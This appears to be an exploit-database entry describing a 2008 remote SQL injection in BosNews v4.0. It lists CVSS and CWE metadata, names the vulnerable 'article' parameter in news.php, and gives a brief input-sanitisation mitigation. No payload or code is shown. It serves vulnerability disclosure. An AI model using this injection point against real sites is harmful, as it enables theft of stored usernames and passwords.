Vendor: BosNews
By: Crackers_Child
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: BosNews
Affected Version From: 4
Affected Version To: 4
Patch Exists: YES
Related CWE: N/A
CPE: a:bosdev:bosnews:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
BosNews v4.0 Remote SQL Injection Exploit
This exploit allows an attacker to inject malicious SQL queries into the vulnerable BosNews v4.0 application. The vulnerable parameter is the ‘article’ parameter in the ‘news.php’ script. By appending a malicious SQL query to the vulnerable parameter, an attacker can gain access to the application’s database and extract sensitive information such as usernames and passwords.
Mitigation:
The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.